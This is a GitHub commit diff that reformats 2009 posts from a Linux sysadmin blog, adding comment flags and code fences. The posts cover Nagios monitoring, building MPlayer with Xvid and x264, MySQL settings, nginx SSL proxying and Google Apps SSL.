Skip to content
Browse files

enable comments for all 2009 posts, fix formatting for 2009 (jan-aug)…

… posts
  • Loading branch information...
1 parent 8fe7450 commit 9beb60beea5751ab61b4ba4a3f68d9ae4a57e260 @gerold gerold committed Jul 3, 2012
Showing with 786 additions and 842 deletions.
  1. +13 −9 source/_posts/2009-01-05-monitoring-a-java-application-from-nagios.markdown
  2. +1 −6 source/_posts/2009-01-06-beer-money-and-open-source-ad-network.markdown
  3. +2 −1 source/_posts/2009-01-06-flvtool2-not-injecting-metadata-video-length.markdown
  4. +1 −0 source/_posts/2009-01-13-at-vendors-mercy.markdown
  5. +56 −113 source/_posts/2009-01-14-compile-mplayermencoder-with-xvid-and-h264-codec-support.markdown
  6. +12 −5 source/_posts/2009-01-14-mysql-error-1153-got-a-packet-bigger-than-max_allowed_packet-bytes.markdown
  7. +1 −12 source/_posts/2009-01-21-largest-security-breach-ever.markdown
  8. +5 −5 source/_posts/2009-01-21-red-hat-enterprise-linux-53-released.markdown
  9. +20 −29 source/_posts/2009-01-23-nginx-proxy-loadbalacing.markdown
  10. +6 −16 source/_posts/2009-01-27-5-most-popular-linux-blog-posts-on-linux-system-admin-blog.markdown
  11. +4 −1 source/_posts/2009-01-27-enforce-ssl-for-google-services.markdown
  12. +1 −0 source/_posts/2009-01-27-google-cutting-back-on-apps-services.markdown
  13. +1 −0 source/_posts/2009-01-27-howto-upgrade-asdm-using-cli-on-cisco-asa5500.markdown
  14. +1 −2 source/_posts/2009-01-27-what-phone-does-a-sys-admin-need.markdown
  15. +1 −0 source/_posts/2009-01-27-xvidencopts-is-not-an-mencoder-option.markdown
  16. +1 −7 ...posts/2009-01-30-web-site-performance-sys-admins-may-be-of-little-help-call-the-designer.markdown
  17. +19 −20 source/_posts/2009-02-02-adbard-dont-die.markdown
  18. +5 −2 source/_posts/2009-02-03-cisco-asa-5505-asdm-error-unconnected-sockets-not-implemented.markdown
  19. +1 −0 source/_posts/2009-02-04-extending-the-slow-query-log.markdown
  20. +20 −11 source/_posts/2009-02-09-upgrade-to-java-se-6-update-12-on-fedora-10.markdown
  21. +2 −1 source/_posts/2009-02-10-howto-recover-from-a-corrupt-rpm-database.markdown
  22. +1 −0 source/_posts/2009-02-17-cisco-asa-5505-activestandby-failover-configuration.markdown
  23. +16 −10 source/_posts/2009-02-17-cloud-computing-scenarios-for-database-servers.markdown
  24. +1 −0 source/_posts/2009-02-19-cloud-computing-chart.markdown
  25. +1 −6 source/_posts/2009-02-23-best-definition-of-cloud-computing-to-date.markdown
  26. +1 −2 ...ven-the-clouds-come-down-to-earth-cloud-services-crash-just-like-everyone-else-sometimes.markdown
  27. +14 −8 source/_posts/2009-02-24-nagios-how-to-check-if-remote-process-is-running.markdown
  28. +1 −0 ...u-910-e2809ckarmic-koalae2809d-will-use-eucalyptus-for-your-own-cloud-computing-solution.markdown
  29. +1 −0 source/_posts/2009-03-03-free-trial-of-cloud-computing.markdown
  30. +1 −2 source/_posts/2009-03-04-apache-solr-drupal-integration.markdown
  31. +3 −26 source/_posts/2009-03-05-drupal-performance-tips-from-drupalcon.markdown
  32. +10 −7 source/_posts/2009-03-09-htaccessmod_rewrite-force-url-to-use-sslhttps.markdown
  33. +1 −35 source/_posts/2009-03-10-ffmpeg-new-major-release.markdown
  34. +6 −3 source/_posts/2009-03-10-running-asdm-client-from-your-linux-desktop.markdown
  35. +9 −6 source/_posts/2009-03-17-asa-allow-passive-ftp-traffic.markdown
  36. +28 −18 source/_posts/2009-03-22-heurtrojanscriptiframe.markdown
  37. +5 −4 source/_posts/2009-03-23-remove-passphrase-from-private-key.markdown
  38. +16 −11 source/_posts/2009-03-24-adding-custom-mantis-bug-status.markdown
  39. +4 −6 source/_posts/2009-03-30-rush-to-stake-a-claim-in-the-cloud.markdown
  40. +4 −1 source/_posts/2009-03-31-scanning-for-conficker-with-nmap.markdown
  41. +1 −0 source/_posts/2009-04-02-big-brother-can-pull-the-plug.markdown
  42. +2 −10 source/_posts/2009-04-03-drupal-howto-duplicate-copy-drupal-site.markdown
  43. +5 −6 source/_posts/2009-04-05-change-hostname-of-cpanel-server.markdown
  44. +1 −1 source/_posts/2009-04-05-linux-devices-at-ctia.markdown
  45. +26 −16 source/_posts/2009-04-07-hp-ilo-remote-managment-online-configuration-part-1.markdown
  46. +2 −9 ...f-google-data-centers-and-presentation-video-from-the-google-efficent-data-center-summit.markdown
  47. +5 −2 source/_posts/2009-04-13-centos-53-released.markdown
  48. +1 −0 source/_posts/2009-04-20-mysql-alternatives.markdown
  49. +1 −0 ..._posts/2009-04-20-sun-dumps-ibm-for-a-better-offer-from-oracle-what-will-happen-to-mysql.markdown
  50. +2 −3 source/_posts/2009-04-21-hawaii-comes-to-our-datecenter.markdown
  51. +1 −0 source/_posts/2009-04-21-mysql-query-cache-good-or-bad.markdown
  52. +13 −13 source/_posts/2009-04-21-toughest-mysql-ceo-email-ever-had-to-write.markdown
  53. +28 −24 source/_posts/2009-04-23-monitoring-drupal-sites-with-nagios.markdown
  54. +1 −0 source/_posts/2009-04-24-lsi-aquires-3warec2ae-from-amcc.markdown
  55. +5 −4 source/_posts/2009-04-28-acrobat-reader-javascript-exploit-hits-linux.markdown
  56. +1 −0 source/_posts/2009-04-30-swine-flue-or-h1n1.markdown
  57. +23 −25 source/_posts/2009-04-30-the-great-cloud-shootout-at-mysql-conference.markdown
  58. +17 −60 source/_posts/2009-05-06-dv-camera-computer-vlan-dvgrab-cheap-video-surveillance.markdown
  59. +1 −2 source/_posts/2009-05-07-csf-not-detecting-pop3-login-failures.markdown
  60. +1 −1 source/_posts/2009-05-11-adbard-comes-back-to-life.markdown
  61. +28 −13 source/_posts/2009-05-12-install-imagemagick-and-imagick-on-cpanel-server.markdown
  62. +2 −6 source/_posts/2009-05-12-sys-admin-beer-money-free-software-foundation-ads.markdown
  63. +1 −0 source/_posts/2009-05-13-howto-delete-all-emails-from-the-postfix-queue.markdown
  64. +19 −13 source/_posts/2009-05-14-setup-nagios-user-to-view-specific-host-and-services.markdown
  65. +3 −2 source/_posts/2009-05-14-umask-ing-apache-under-cpanel.markdown
  66. +22 −22 source/_posts/2009-05-14-us-to-invade-asia-over-google-traffic-snafoo.markdown
  67. +1 −1 source/_posts/2009-05-19-googles-cheeseburgers.markdown
  68. +1 −0 source/_posts/2009-05-19-rhelcentos-x86_64-and-i386-packages-mess.markdown
  69. +8 −3 source/_posts/2009-05-21-install-gnupg-php-extension-in-cpanel.markdown
  70. +6 −3 source/_posts/2009-05-22-hidden-wordpress-spam.markdown
  71. +1 −0 source/_posts/2009-05-26-red-hat-enterprise-linux-48-released.markdown
  72. +4 −2 source/_posts/2009-05-27-nginx-rewrite-to-index.markdown
  73. +1 −0 source/_posts/2009-05-27-when-open-source-kills.markdown
  74. +30 −17 source/_posts/2009-05-29-moving-magento-sites.markdown
  75. +5 −2 source/_posts/2009-06-02-howto-get-started-with-amazon-ec2-api-tools.markdown
  76. +1 −0 source/_posts/2009-06-11-new-debian-apt-keys.markdown
  77. +1 −0 source/_posts/2009-06-16-cacti-and-mysql-counters-problem.markdown
  78. +9 −23 source/_posts/2009-06-16-tracing-memory-leaks-with-pidstat.markdown
  79. +32 −67 source/_posts/2009-06-29-moving-drupalcivicrm-sites.markdown
  80. +8 −6 source/_posts/2009-06-29-my-first-amazon-ec2-setup-centos-ami.markdown
  81. +45 −14 source/_posts/2009-07-01-install-apache-solr-multicore-for-drupal.markdown
  82. +4 −4 source/_posts/2009-07-03-ffmpeg-scratchy-sound.markdown
  83. +31 −14 source/_posts/2009-07-06-install-truecrypt-on-fedora-10.markdown
  84. +4 −1 source/_posts/2009-07-14-syntax-error-on-mysql-replication-slave-error-1064.markdown
  85. +25 −11 source/_posts/2009-07-20-waiting-for-ssh-login-prompt.markdown
  86. +15 −10 source/_posts/2009-07-22-enabling-allow_url_include-locally-in-cpanel.markdown
  87. +4 −27 source/_posts/2009-07-29-task-on-amazon-ebs-on-centos-ami.markdown
  88. +2 −10 source/_posts/2009-07-30-july-31st-system-admin-day.markdown
  89. +1 −0 source/_posts/2009-08-17-using-svnssh-with-a-non-standard-ssh-port.markdown
  90. +10 −8 source/_posts/2009-08-25-beyond-4gb-ram-on-32bit-linux.markdown
  91. +1 −0 source/_posts/2009-08-25-using-wildcards-in-nginx-valid_referers.markdown
  92. +2 −1 source/_posts/2009-09-01-centos-4-8-finally-released.markdown
  93. +2 −1 source/_posts/2009-09-01-google-webmail-bites-it.markdown
  94. +1 −0 ...e/_posts/2009-09-14-hpacucli-error-while-loading-shared-libraries-libstdc-libc6-2-2-so-3.markdown
  95. +1 −0 source/_posts/2009-09-15-howto-display-php-errors-when-you-dont-have-access-to-php-ini.markdown
  96. +1 −0 source/_posts/2009-09-21-iframe-injection-attack-investigation.markdown
  97. +1 −0 source/_posts/2009-09-22-drupal-watchdog-error.markdown
  98. +1 −0 source/_posts/2009-10-12-how-are-servers-like-kitchens.markdown
  99. +1 −0 source/_posts/2009-10-12-the-next-open-source-protocol-google-wave.markdown
  100. +1 −0 source/_posts/2009-10-19-change-squid-outgoing-address.markdown
  101. +1 −0 source/_posts/2009-10-19-managed-dns-services-showdown.markdown
  102. +1 −0 .../2009-10-21-apple-sold-3-1-million-macs-in-the-last-three-months-17-more-than-a-year-ago.markdown
  103. +1 −0 source/_posts/2009-10-21-php-5-2-9-on-rhel5-x-for-drupal-6.markdown
  104. +1 −0 source/_posts/2009-10-21-sysadmin-tool-of-the-week-update-scout.markdown
  105. +1 −0 source/_posts/2009-10-25-linux-will-take-mobile-with-android-plus-android-turns-one.markdown
  106. +1 −0 source/_posts/2009-10-25-whitehouse-org-goes-open-source-with-drupal.markdown
  107. +1 −0 source/_posts/2009-10-27-amazon-ec2-prices-fall-high-memory-instances-rds.markdown
  108. +1 −0 source/_posts/2009-10-27-problem-with-lilo-boot-loader.markdown
  109. +1 −0 source/_posts/2009-11-03-centos-5-4-released.markdown
  110. +1 −0 source/_posts/2009-11-09-cant-set-root-password-in-ubuntu.markdown
  111. +1 −0 source/_posts/2009-11-09-sysadmin-tool-of-the-week-terminator.markdown
  112. +1 −0 source/_posts/2009-11-10-mysql-sale-to-oracle-blocked-by-eu.markdown
  113. +1 −0 source/_posts/2009-11-22-upgrade-to-fedora-12.markdown
  114. +1 −0 source/_posts/2009-11-23-xen-vm-mount-external-devices.markdown
  115. +1 −0 source/_posts/2009-11-24-apache-now-supports-multiple-ssl-on-single-ip-address.markdown
  116. +1 −0 ...posts/2009-11-25-black-friday-404-site-not-available-and-others-from-your-favorite-sites.markdown
  117. +1 −0 source/_posts/2009-12-03-google-to-offer-free-dns-service.markdown
View
22 source/_posts/2009-01-05-monitoring-a-java-application-from-nagios.markdown
@@ -1,5 +1,6 @@
---
author: pim-van-der-wal
+comments: true
published: true
date: '2009-01-05 16:16:47'
layout: post
@@ -19,26 +20,29 @@ tags:
This is a slight departure from our regular programming. Instead of just concentrating on the sys admin side of things I want to show how to add a Nagios check to an existing application. In this case we have a Java application for which we want to monitor whether it is running or not. Later on we can make this more detailed by monitoring error codes in the application but for the moment let's keep it simple.
**Configuring Nagios**
+
On the Nagios end of things we need to define a command to perform a check on a specific port of the server where the application is running. Add a line like this to the objects/commands.cfg file of your Nagios installation.
-`
+```
define command{
command_name check_your_application_name
command_line $USER1$/check_tcp -H $HOSTADDRESS$ -p $ARG1$ -e "This application is alive and well"
-}`
+}
+```
The -e parameter checks for a specific text that is to be returned by the application. This we can use later on to check for more detailed information. Next we need to add a service to Nagios for using this command. We do this by adding the following lines to the objects/localhost.cfg file. To keep this short I left out some lines which configure the frequency of the checks and the types of alerts.
-`
+```
define service {
use                    generic-service
host_name              your_server_name
service_description    your_service_name
check_command          check_your_application_name!2222
-}`
+}
+```
**Creating a listener port in Java**
-In the second part I will show you the actual code to add to your application. Because this is a blog post I left out the package definition and the includes, but other than that the class itself is usable. To add the check to the Java app we need to add a listener thread to application. We do this by creating a class that is derived from Thread. This listener will open a port which is specified by the main application and a respond to any incoming data with a preset text. We really don't care about the input on this end so any input will be  ignored:
-
+In the second part I will show you the actual code to add to your application. Because this is a blog post I left out the package definition and the includes, but other than that the class itself is usable. To add the check to the Java app we need to add a listener thread to application. We do this by creating a class that is derived from Thread. This listener will open a port which is specified by the main application and a respond to any incoming data with a preset text. We really don't care about the input on this end so any input will be  ignored:
+```
public class NagiosChecker extends Thread {
// Server socket
private ServerSocket srv;
@@ -85,11 +89,10 @@ In the second part I will show you the actual code to add to your application. B
}
}
}
-
+```
In case you're still reading this you're probably interested in how to call this class. The following code should be executed in the initialization of the application. It creates the actual socket for port 2222 and starts the listener class. After this the listener class will run indefinitely until the application terminates.
-
-
+```
ServerSocket srv = null;
try {
srv = new ServerSocket(2222);
@@ -98,3 +101,4 @@ In case you're still reading this you're probably interested in how to call this
} catch (Exception e) {
System.out.println(e.getMessage());
}
+```
View
7 source/_posts/2009-01-06-beer-money-and-open-source-ad-network.markdown
@@ -1,6 +1,7 @@
---
author: andrew-kucharski
published: true
+comments: true
date: '2009-01-06 00:36:16'
layout: post
slug: beer-money-and-open-source-ad-network
@@ -17,16 +18,10 @@ Beer money and open source ad network don't really have anything to do with each
Here is what the good folks at [Ad Bard] are all about:
-
> At Ad Bard, we believe that advertisements can be an effective way for FLOSS oriented websites to generate regular income while remaining useful, relevant, and non-obnoxious.
Our advertising community is entirely built with free/libre and open source software, with all involved algorithms and schemas freely available for public scrutiny.
-
Its also worth to note that their site is running on the [Drupal](http://www.drupal.org) platform.
Linux System Admin Blog became an accepted member late last year and we plan on running some ads shortly.  So when you see our ads, be encouraged that they are part of the FLOSS community and will do us some good by supplying the badly needed happy hour. Here is one right now...
-
-
-
-
View
3 source/_posts/2009-01-06-flvtool2-not-injecting-metadata-video-length.markdown
@@ -1,6 +1,7 @@
---
author: gerold-mercadero
published: true
+comments: true
date: '2009-01-06 07:59:42'
layout: post
slug: flvtool2-not-injecting-metadata-video-length
@@ -17,4 +18,4 @@ You can check for the latest release at [RubyForge](http://rubyforge.org/frs/?gr
Upgrade process is easy, same as the installation process, and if you need help visit our detailed guide on **"[Installing ffmpeg and its components](http://linuxsysadminblog.com/2008/06/install-ffmpeg-ffmpeg-php-and-audio-binaries-on-centos-rhel-system-with-cpanel/)"** and look for Flvtool2 section.
-If you're still having problem after Flvtool2 upgrade check your Ruby installation as you may need to update it as well.  If you're on a Cpanel server you can use Cpanel's Ruby install script at "_/scripts/installruby_".
+If you're still having problem after Flvtool2 upgrade check your Ruby installation as you may need to update it as well.  If you're on a Cpanel server you can use Cpanel's Ruby install script at `/scripts/installruby`".
View
1 source/_posts/2009-01-13-at-vendors-mercy.markdown
@@ -1,6 +1,7 @@
---
author: max-veprinsky
published: true
+comments: true
date: '2009-01-13 08:00:43'
layout: post
slug: at-vendors-mercy
View
169 source/_posts/2009-01-14-compile-mplayermencoder-with-xvid-and-h264-codec-support.markdown
@@ -1,6 +1,7 @@
---
author: gerold-mercadero
published: true
+comments: true
date: '2009-01-14 05:48:39'
layout: post
slug: compile-mplayermencoder-with-xvid-and-h264-codec-support
@@ -13,139 +14,81 @@ categories:
Default Mplayer installation autodetects Xvid, H264 and other codecs. So if you have Xvid and H264 codecs installed your mencoder and mplayer should support it, unless you disable them during compilation.  In order to have your Mencoder and Mplayer support Xvid and H264 you need to install them first and then compile/re-compile Mencoder/Mplayer.
-
-
-
-**Install [Xvid](http://www.xvid.org/). **Xvid is a free software MPEG-4 ASP compliant video codec.
-
-
-
-
-
-
- * download the latest release from [Xvid.org](http://www.xvid.org/Downloads.43.0.html), during this time of post the latest stable release is 1.2.1.
-
-_wget http://downloads.xvid.org/downloads/xvidcore-1.2.1.tar.gz_
-
-
- * Unpack tarball file:
-
-_tar xzpf xvidcore-1.2.1.tar.gz_
-
-
- * Go to build/generic folder:
-
-_cd xvidcore-1.2.1/build/generic/_
-
-
-
- * Build and install
-
-_./configure
-
+**Install [Xvid](http://www.xvid.org/).**
+
+Xvid is a free software MPEG-4 ASP compliant video codec.
+
+* download the latest release from [Xvid.org](http://www.xvid.org/Downloads.43.0.html), during this time of post the latest stable release is 1.2.1.
+```
+wget http://downloads.xvid.org/downloads/xvidcore-1.2.1.tar.gz
+```
+* Unpack tarball file:
+```
+tar xzpf xvidcore-1.2.1.tar.gz
+```
+* Go to build/generic folder:
+```
+cd xvidcore-1.2.1/build/generic/
+```
+* Build and install
+```
+./configure
make
-
-make install_
-
-
-
-
+make install
+```
**Note**:  At this point you can recompile your Mplayer/Mencoder to have Xvid support - in case you don't want to have H264 support.
+**Install [H264](http://developers.videolan.org/x264.html)**.
-
-**Install [H264](http://developers.videolan.org/x264.html)**.  H264/x264 is a library for creating H.264 video. MPlayer sources are updated whenever an x264 API change occurs, so it is always suggested to use MPlayer from Subversion.  At this time of post x264 in on development release only.
-
-
-
+H264/x264 is a library for creating H.264 video. MPlayer sources are updated whenever an x264 API change occurs, so it is always suggested to use MPlayer from Subversion.  At this time of post x264 in on development release only.
Using [GIT](http://git-scm.com) - download [1.6.1](http://www.kernel.org/pub/software/scm/git/git-1.6.1.tar.gz).
-
-
-
-
-
- * Get the latest x264 source using git:
-
-_git clone git://git.videolan.org/x264.git_
-
-
- * Build and install:
-
-_cd x264
-
+* Get the latest x264 source using git:
+```
+git clone git://git.videolan.org/x264.git
+```
+* Build and install:
+```
+cd x264
./configure
-
make
-
-make install_
-
-
-
+make install
+```
If you don't have GIT and don't want to install it, you can use the daily snapshot.
-
-
-
-
-
-
- * Download the latest snapshot(tarball) [here](ftp://ftp.videolan.org/pub/videolan/x264/snapshots/):
-
-_wget ftp://ftp.videolan.org/pub/videolan/x264/snapshots/x264-snapshot-20090113-2245.tar.bz2_
-
-
- * Extract tarball
-
-_bzip2 -cd x264-snapshot-20090113-2245.tar.bz2 | tar xvf -
-
-cd x264-snapshot-20090113-2245_
-
-
- * Build and install
-
-_./configure
-
+* Download the latest snapshot(tarball) [here](ftp://ftp.videolan.org/pub/videolan/x264/snapshots/):
+```
+wget ftp://ftp.videolan.org/pub/videolan/x264/snapshots/x264-snapshot-20090113-2245.tar.bz2
+```
+* Extract tarball
+```
+bzip2 -cd x264-snapshot-20090113-2245.tar.bz2 | tar xvf -
+cd x264-snapshot-20090113-2245
+```
+* Build and install
+```
+./configure
make
-
-make install_
-
-
-
+make install
+```
**Compile/Re-compile Mplayer**:
-
-
-
You can use the latest release version of [Mplayer](http://www3.mplayerhq.hu/MPlayer/releases/) for Xvid only but there are issues during build on x264, as it is not updated. It's better to re-compile Mplayer from their SVN.
-
-
-
-
-
- * Checkout the latest version:
-
-_svn checkout svn://svn.mplayerhq.hu/mplayer/trunk mplayer_
-
-
- * Build and install:
-
-_cd mplayer
-
+* Checkout the latest version:
+```
+svn checkout svn://svn.mplayerhq.hu/mplayer/trunk mplayer
+```
+* Build and install:
+```
+cd mplayer
./configure
-
make
-
-make install_
-
-
-
+make install
+```
**NOTE:** This install process was tested on Centos 5.2.
-
-
View
17 ...ts/2009-01-14-mysql-error-1153-got-a-packet-bigger-than-max_allowed_packet-bytes.markdown
@@ -1,5 +1,6 @@
---
published: true
+comments: true
author: gerold-mercadero
date: '2009-01-14 21:43:46'
layout: post
@@ -12,17 +13,23 @@ categories:
---
I got this error while importing large database dump from command line.
- _ERROR 1153 (08S01) at line XXX: Got a packet bigger than 'max_allowed_packet' bytes_
+```
+ERROR 1153 (08S01) at line XXX: Got a packet bigger than 'max_allowed_packet' bytes
+```
I searched and found out that it is related to the default _max_allowed_packet_ which is _16M_, so i need to increase this setting from Mysql:
1.) **Change setting on my.cnf and restart mysql:**
- _set-variable = max_allowed_packet=32M
- /etc/init.d/mysql restart_
+```
+set-variable = max_allowed_packet=32M
+/etc/init.d/mysql restart
+```
Or;
2.) **Change setting temporarily. Login to MySQL and issue:**
- _SET GLOBAL max_allowed_packet=1000000000;_
- **Note:** You may want to restart your Mysql to reload your previous/default settings.
+```
+SET GLOBAL max_allowed_packet=1000000000;
+```
+ **Note:** You may want to restart your Mysql to reload your previous/default settings.
View
13 source/_posts/2009-01-21-largest-security-breach-ever.markdown
@@ -1,6 +1,7 @@
---
author: andrew-kucharski
published: true
+comments: true
date: '2009-01-21 09:55:32'
layout: post
slug: largest-security-breach-ever
@@ -16,26 +17,14 @@ categories:
**[Card Data Breached, Firm Says](http://online.wsj.com/article/SB123249174099899837.html)**
-
> A New Jersey credit-card processor disclosed a data breach that analysts said may rank among the biggest ever reported.
Heartland Payment Systems Inc. said Tuesday that cyber criminals compromised its computer network, gaining access to customer information associated with the 100 million card transactions it handles each month.
-
The problem was discovered after fraudulent transactions were reported to Heartland by Visa and Master card.  It appears that the breach was discovered by a forensic investigator who said that the malicious software was "light years more sophisticated" than other malevolent programs in existence today.
Heartland processes transactions for more than 250,000 customers and its not clear how many credit card numbers it has access to.
It just goes to show that as much of a pain security is and PCI compliance is just a tip of the iceberg necessary to keep the bad guys out.
For more interesting reading, and a list of the 2008 security[ breaches compiled by ITRC c](http://www.idtheftcenter.org/artman2/publish/lib_survey/ITRC_2008_Breach_List.shtml)heck out the company's site or this [2008 security breach report](http://www.idtheftcenter.org/BreachPDF/ITRC_Breach_Report_2008_final.pdf) (pdf).
-
-
->
-
->
->
-
-
-
-
View
10 source/_posts/2009-01-21-red-hat-enterprise-linux-53-released.markdown
@@ -1,6 +1,7 @@
---
author: andrew-kucharski
published: true
+comments: true
date: '2009-01-21 10:06:39'
layout: post
slug: red-hat-enterprise-linux-53-released
@@ -11,12 +12,11 @@ categories:
- Centos
---
-## [Red Hat Enterprise Linux 5.3 Now Available](http://www.redhat.com/about/news/prarchive/2009/rhel_5_3.html?sc_cid=70160000000HgJdAAK) with Leading Virtualization Performance and Next-Generation Java and Processor Support Capabilities
-
+[**Red Hat Enterprise Linux 5.3** Now Available](http://www.redhat.com/about/news/prarchive/2009/rhel_5_3.html?sc_cid=70160000000HgJdAAK) with Leading Virtualization Performance and Next-Generation Java and Processor Support Capabilities
Main three updates include:
-- support for Hugepage memory and Intel Extended Page Tables (EPT), dramatically improve the performance of virtual servers, extending number of CPUs supported and maximum memory
-- Support for Intel Core i7 (Nehalem) processor
-- bundled in is the [openJDK](http://openjdk.java.net/)
+* support for Hugepage memory and Intel Extended Page Tables (EPT), dramatically improve the performance of virtual servers, extending number of CPUs supported and maximum memory
+* Support for Intel Core i7 (Nehalem) processor
+* bundled in is the [openJDK](http://openjdk.java.net/)
At time of this writing release of 5.3 [CentOS ](http://centos.org/)was not yet available.
View
49 source/_posts/2009-01-23-nginx-proxy-loadbalacing.markdown
@@ -1,6 +1,7 @@
---
author: max-veprinsky
published: true
+comments: true
date: '2009-01-23 19:57:37'
layout: post
slug: nginx-proxy-loadbalacing
@@ -13,14 +14,9 @@ categories:
One of many uses of [NGINX](http://wiki.codemongers.com/Main) is http/https proxy load balancing. This guide is Debian specific so your milage with other flavors may vary. In this example we always redirect http to https.
-The main nginx configation file is /etc/nginx/nginx.conf and below is a sample configuration file:
-
-
-
-
-
-
- <code>user www-data;
+The main nginx configation file is `/etc/nginx/nginx.conf` and below is a sample configuration file:
+```
+ user www-data;
worker_processes 5;
error_log /var/log/nginx/error.log;
@@ -52,18 +48,17 @@ The main nginx configation file is /etc/nginx/nginx.conf and below is a sample c
include /etc/nginx/conf.d/*.conf;
include /etc/nginx/sites-enabled/*;
- }</code>
-
-
+ }
+```
To add a site:
**Prepare SSL**
1. Create a .pem file which contains the certificate, certificate signing request and private key in the following format(certificate request section optional):
-Example: mysite.com.pem
-`
+Example: `mysite.com.pem`
+```
-----BEGIN RSA PRIVATE KEY-----
MIICXQIBAAKBgQC5EAGorvRHq1MfWliXCpsVotv9wNTblylHKb3FjJJm/BvVtXaB
KhcfFU8vJDVVFs890oKwSiemGyu1I9E/AzDWl53mhep4J+BJRODg2ehVgB4paR4t
@@ -87,17 +82,15 @@ EQYDVQQLEwpHVDk5MDc4NTE5MTEwLwYDVQQLEyhTZWUgd3d3Lmdlb3RydXN0LmNv
bS9yZXNvdXJjZXMvY3BzIChjKTA5MTcwNQYDVQQLEy5Eb21haW4gQ29udHJvbCBW
YWxpZGF0ZWQgLSBRdWlja1NTTCBQcmVtaXVtKFIpMRowGAYDVQQDExF3d3cubGVu
-----END CERTIFICATE-----
-`
+```
-2. Copy .pem file to /etc/nginx/ssl directory with 600 (-rw-------) permissions and owned by user/group root
+2. Copy .pem file to `/etc/nginx/ssl` directory with `600 (-rw-------)` permissions and owned by user/group `root`
**Create site configuration file**
-1 . Site configuration file goes in /etc/nginx/site-available/ directory with the name of the site's URL.
-
-
-
- <code>server {
+1 . Site configuration file goes in `/etc/nginx/site-available/` directory with the name of the site's URL.
+```
+ server {
listen 192.168.1.1:80;
server_name www.mysite.com mysite.com;
access_log /var/log/nginx/access_http.log;
@@ -125,25 +118,23 @@ YWxpZGF0ZWQgLSBRdWlja1NTTCBQcmVtaXVtKFIpMRowGAYDVQQDExF3d3cubGVu
proxy_redirect off;
}
}
- </code>
-
-
+```
2. Place a symbolic link to configuration file in /etc/nginx/sites-enabled:
-
+```
ln -s /etc/nginx/sites-available/mysite.com /etc/nginx/sites-enabled/mysite.com
+```
3. Reload nginx configuration
-
+```
/etc/init.d/nginx reload
+```
4. Check if nginx process has started and is listening on configured IP:
-
+```
netstat -alnp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 192.168.1.1:80 0.0.0.0:* LISTEN 9593/nginx
tcp 0 0 192.168.1.1:443 0.0.0.0:* LISTEN 9593/nginx
-
-
-
+```
View
22 source/_posts/2009-01-27-5-most-popular-linux-blog-posts-on-linux-system-admin-blog.markdown
@@ -1,6 +1,7 @@
---
author: andrew-kucharski
published: true
+comments: true
date: '2009-01-27 00:07:12'
layout: post
slug: 5-most-popular-linux-blog-posts-on-linux-system-admin-blog
@@ -13,27 +14,16 @@ categories:
**Our top 5 blog posts in terms of number of clicks received in 2008**
+1. [INSTALL FFMPEG FFMPEG-PHP AND AUDIO BINARIES ON CENTOS / RHEL SYSTEM WITH CPANEL by Gerold ](http://linuxsysadminblog.com/2008/06/install-ffmpeg-ffmpeg-php-and-audio-binaries-on-centos-rhel-system-with-cpanel/)This guide is intented for the installatiion of ffmpeg, ffmpeg-php, mplayer, mencoder, lame mp3 encoder, flvtool2, libVorbis, and libogg and tested on CentOS5 and RHEL3 systems with Cpanel.
-
-
- 1.
-[INSTALL FFMPEG FFMPEG-PHP AND AUDIO BINARIES ON CENTOS / RHEL SYSTEM WITH CPANEL by Gerold ](http://linuxsysadminblog.com/2008/06/install-ffmpeg-ffmpeg-php-and-audio-binaries-on-centos-rhel-system-with-cpanel/)This guide is intented for the installatiion of ffmpeg, ffmpeg-php, mplayer, mencoder, lame mp3 encoder, flvtool2, libVorbis, and libogg and tested on CentOS5 and RHEL3 systems with Cpanel.
-
-
- 2.
-[How to check if your DNS server implements source port randomization by Marius ](http://linuxsysadminblog.com/2008/12/how-to-check-if-your-dns-server-implements-source-port-randomization/)**Fixed source port for generating queries** – in most dns implementations the source port for outgoing queries is fixed at the traditional assigned DNS server port number, **53/udp**.
+2. [How to check if your DNS server implements source port randomization by Marius ](http://linuxsysadminblog.com/2008/12/how-to-check-if-your-dns-server-implements-source-port-randomization/)**Fixed source port for generating queries** – in most dns implementations the source port for outgoing queries is fixed at the traditional assigned DNS server port number, **53/udp**.
We can easily find out if our own dns server is using a fixed source port for queries by looking into **named.conf** 
-
- 3. [Upgrading to trac 0.11](http://linuxsysadminblog.com/2008/11/upgrading-to-trac-011/)  by Marius
+3. [Upgrading to trac 0.11](http://linuxsysadminblog.com/2008/11/upgrading-to-trac-011/)  by Marius
 This article will outline the steps necessary to perform the **upgrade **from an older version of **trac **(normally 0.10 that many people are still running) to the latest stable branch **0.11** (more precisely 0.11.2 available at this time).
-
- 4. [MySQL error 1449 “There is no ‘username’@'host’ registered”](http://linuxsysadminblog.com/2008/06/mysql-error-1449-there-is-no-usernamehost-registered/)  by Pim
+4. [MySQL error 1449 “There is no ‘username’@'host’ registered”](http://linuxsysadminblog.com/2008/06/mysql-error-1449-there-is-no-usernamehost-registered/)  by Pim
The error message in the title occurs in a combination of circumstances. If you have 2 MySQL databases, one master and one slave in a replicating setup and you use triggers you may encounter this error. 
-
- 5. [ Implementing AES encryption in the front-end](http://linuxsysadminblog.com/2008/06/implementing-aes-encryption-in-the-front-end/) by Pim
+5. [ Implementing AES encryption in the front-end](http://linuxsysadminblog.com/2008/06/implementing-aes-encryption-in-the-front-end/) by Pim
 This post describes a way to implement data encryption in the front-end of an application and how to make it compatible between a PHP front-end and a Java front-end.
-
-
View
5 source/_posts/2009-01-27-enforce-ssl-for-google-services.markdown
@@ -1,6 +1,7 @@
---
author: max-veprinsky
published: true
+comments: true
date: '2009-01-27 16:30:45'
layout: post
slug: enforce-ssl-for-google-services
@@ -13,12 +14,14 @@ categories:
Most Google services are now avaible over **encrypted** ssl connections. **Google Apps** now offers the option to enforce ssl for most of it's services. Here is the overview:
+`
Email - Yes.
Calendar - Yes.
Docs - Yes.
Sites - Yes.
Chat - Yes. SSL supports Chat in Gmail. The Google Talk Client is always over a secure connection (TLS).
Video - Not available.
Start Page - Not available. This includes start page gadgets for email, chat, calendar, and docs account.
+`
-To enable SSL enforcement in Google Apps services login as an Administrative user for your Google Apps hosted domain, click on "**Domain Settings**" tab and check "**SSL**" checkbox.
+To enable SSL enforcement in Google Apps services login as an Administrative user for your Google Apps hosted domain, click on *Domain Settings* tab and check *SSL* checkbox.
View
1 source/_posts/2009-01-27-google-cutting-back-on-apps-services.markdown
@@ -1,5 +1,6 @@
---
published: true
+comments: true
author: max-veprinsky
date: '2009-01-27 16:13:01'
layout: post
View
